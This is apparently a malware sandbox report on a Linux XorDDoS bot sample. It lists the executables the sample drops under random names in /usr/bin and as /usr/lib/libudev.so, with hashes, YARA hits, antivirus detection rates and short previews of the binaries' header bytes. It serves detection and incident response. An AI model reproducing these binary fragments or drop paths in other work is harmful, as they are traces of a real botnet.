File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244412268985132
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AN:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91q
MD5:	25BBB89787F3D46FD40211220F087144
SHA1:	3880176B292BD0F33A570CFD322CE7BAD399B5DE
SHA-256:	33F7A97D048FF5A6AEE7D104BA8077CF5401B28B8111B6A5D7E18B1363E3D522
SHA-512:	CAB879B62D1075FFC27B1BF2A6B9D6CF9FB0424C7CD36CC7BE8CA8D02BA0481E3D94A151B7F6527A080859D8CA602279E2BDB1807A21EE21B0FE4A4CD2371E27
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mbeioyodii, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mbeioyodii, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/mbeioyodii, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mbeioyodii, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/mbeioyodii, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/mbeioyodii, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/mbeioyodii, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mbeioyodii, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/mntlutgnfs

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625900
Entropy (8bit):	6.244430011977312
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AA:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91J
MD5:	7087CDA9340637572E5B22D072B11FFB
SHA1:	E44D5A64CB24611FDACF8FF4125A64604F317ED9
SHA-256:	87FE3C9E41DD71EF3625AE15576D019234DDA538336791271C5408C7684CBAF3
SHA-512:	AC69009ACEEAD5E70B3E77B0435CB00F5F684FC3092CC6971597D36C7A5486AC048EA0D3F461A42843509527A5D20B5879543E08ED4CA6EA52F8E338369B00A5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mntlutgnfs, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mntlutgnfs, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/mntlutgnfs, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mntlutgnfs, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/mntlutgnfs, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/mntlutgnfs, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/mntlutgnfs, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mntlutgnfs, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/qabtuykfdb

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244409791205253
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ak:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91L
MD5:	CFC60E87B79B9FDA780D09582C8FFD8A
SHA1:	D81C786AA9270429C03F151D6DC6D94A3B966171
SHA-256:	9CB17DB65145909C9350F15E1590CF5DB7AD06004F7E04E28DEF25F4F843A79C
SHA-512:	541F7B74BD16EE61C3BDB6C1B2C96C3CC5DA06178935AF6C7C004C8EAD19CC58350D1622A3C2A89A1291FF546961586296123C49ADE5F36875FC7B73DE1BD2B3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qabtuykfdb, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/qabtuykfdb, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/qabtuykfdb, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/qabtuykfdb, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/qabtuykfdb, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/qabtuykfdb, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qabtuykfdb, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qabtuykfdb, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/rhlqbltizb

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244420482464794
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AY:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91/
MD5:	FD558E890AAC97EBDD84C36AF046CE6A
SHA1:	904730E5B5CB37A5B45ABB537822897BFCF3B882
SHA-256:	E4945B420409DC4AD082A93FFB532D7CEDC9605D4C1E34AAACC0A390B2405090
SHA-512:	525D8C52177C7F2F5948F0ED559DD848D02417E8C0D0F81769D2B8DB0F0C3793F02DDC0E1EC66FD3FC6F627C077E10D7768CD366BAD9164166A0FBC05C4EA7F8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/rhlqbltizb, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/rhlqbltizb, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/rhlqbltizb, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/rhlqbltizb, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/rhlqbltizb, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/rhlqbltizb, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/rhlqbltizb, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/rhlqbltizb, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/scllcnzpeu

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.2444171455139035
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AM:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91P
MD5:	8AB8F35C125242672F1FDCBF9821815C
SHA1:	A9AFF5DF9C28A1684F31D38D69B9C0475FEB9438
SHA-256:	5850F3DA7B8D24B36EA80628AE5C852D7853127069D1FD3BB6AEFAECF613DE6B
SHA-512:	465BFB4AC1A50462B3B557966F8AF10A54D66A2742BFC766D31CA7C800679AE59E54ABE87A315F90807E8F9950A9E1DCE1E1575C340B3C7A480371A9223775C0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/scllcnzpeu, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/scllcnzpeu, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/scllcnzpeu, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/scllcnzpeu, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/scllcnzpeu, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/scllcnzpeu, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/scllcnzpeu, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/scllcnzpeu, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/tgdthymawi

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244415168453423
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AN:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/916
MD5:	44B0B9A89834D2FCF626817CB38D28B6
SHA1:	007E92E45A0FCC1D129101FE265447DC85753FF1
SHA-256:	9CE49C7433D68FB5E6FB07D3EFCD69A85F7196FA7AF7A188E6EB22165039D9CA
SHA-512:	8A44B09CEF429A5C38F8FE6D86904B71C85E6FF2661B69DEC6D809FE9ED7DB6FDA4496F881A510986E40609FE97FE7C9BF0829D56499AF3AEA87ED27712BD330
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tgdthymawi, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/tgdthymawi, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/tgdthymawi, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/tgdthymawi, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/tgdthymawi, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/tgdthymawi, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tgdthymawi, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tgdthymawi, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/tqdlzqtrvv

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	593920
Entropy (8bit):	6.1556219396671885
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EE8:FBXmkN/+Fhu/Qo4h9L+zNNyBVE8
MD5:	6A2A2012BDFC5207E7DDF0B86BD1A8E1
SHA1:	78715C5E22760FBD67D5D3EF283BA70A9CC97963
SHA-256:	0C087F1967A7AA05C214F9F5BDB0A1148AE1BCA16F784D29D5CB5315DD531614
SHA-512:	88A573AA905DAFE1A97012B6BB6139BFF388840D8B7F6C0A155C8ACA4260A43382907D9B0FFAFB2DFA8354E2F676F19436587C6165710B11A1E457F71001FA6F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tqdlzqtrvv, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/tqdlzqtrvv, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/tqdlzqtrvv, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/tqdlzqtrvv, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/tqdlzqtrvv, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/tqdlzqtrvv, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tqdlzqtrvv, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 80% Antivirus: Virustotal, Detection: 66%, Browse
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wobaryykiz

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.2444092355614815
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Av:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91o
MD5:	F82E5B84C6EEE7C90E56EE733682E625
SHA1:	0D393F520B6B03B01D59B44A913202345E0FB1B4
SHA-256:	74859BA997D695F6349646D5552278457694A6BA9C29642BE85F44EB509F6058
SHA-512:	C02BBBBB17A07AFD71C468648652F571A765D32037D2AC9B42FAE4978E9217115BB1CD78AB48B29FBC0D7DDF2CE739E56E38F161C1681D97CD7DED489218BE24
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wobaryykiz, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wobaryykiz, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wobaryykiz, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wobaryykiz, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wobaryykiz, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wobaryykiz, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wobaryykiz, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wobaryykiz, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wrvptdarnp

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244406336071218
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91O
MD5:	DDF045010B43B44731521349AB7BE7B9
SHA1:	22D5E3DAF1D48C385CBBE94652B494C3D582FBEF
SHA-256:	1E301F34B818498488E34E448BC0D8DDBB3A10137C8D6E772CBC65ECEBF06EB6
SHA-512:	3CDA1BE860955C454DF3E5240AA0C1B8BFB6944516F11D55F7A3BF2F8DF9D54C958758C85A2F97985820949E23287C2DA7C250580E8E1DCF029A50BA233A1B1B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wrvptdarnp, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wrvptdarnp, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wrvptdarnp, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wrvptdarnp, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wrvptdarnp, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wrvptdarnp, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wrvptdarnp, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wrvptdarnp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zfzhrlhjxr

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625900
Entropy (8bit):	6.244436715356164
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Al:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91c
MD5:	C8A82C85DDEA45F8CFBB9B1637DEFA4F
SHA1:	BF6E1996B72453119C196DE22FB8D5A59FC0C28A
SHA-256:	545C38908B95C067DAF9572988D1D11E14013C83E35A97E116BBFDD4C3118C22
SHA-512:	43D22A969FF2F545292B25C95C1ECAFBDE70310B5E4BF2E114DE308806F8233069DDECB053F7F69AB03EB714DB8DF012F97029F2712FBE0DA9D585D2122CCE72
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zfzhrlhjxr, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zfzhrlhjxr, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/zfzhrlhjxr, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zfzhrlhjxr, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/zfzhrlhjxr, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/zfzhrlhjxr, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/zfzhrlhjxr, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zfzhrlhjxr, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/lib/libudev.so

Download File

Process:	/tmp/dptxrnhxmx.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.2443817863410676
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ae:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91f
MD5:	85682D3EFFDB2D559FD84DF491E9461A
SHA1:	2FB53F36A77339E1DD8458DD3FE561355DE76211
SHA-256:	3A8A11B60FD8E2F93D29FB46CDDA68FD404B06147A7C717D3619B088E39875BA
SHA-512:	F4CB94B160ED93D57B05D151C949C4DFD3A8B44D45AF6D9432D2A9F1FAFC02DEC4E66D4F3CBDEEBA16C769FC97B4F48A611AA92F653B1AA8F07B90D876168A86
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 74%, Browse
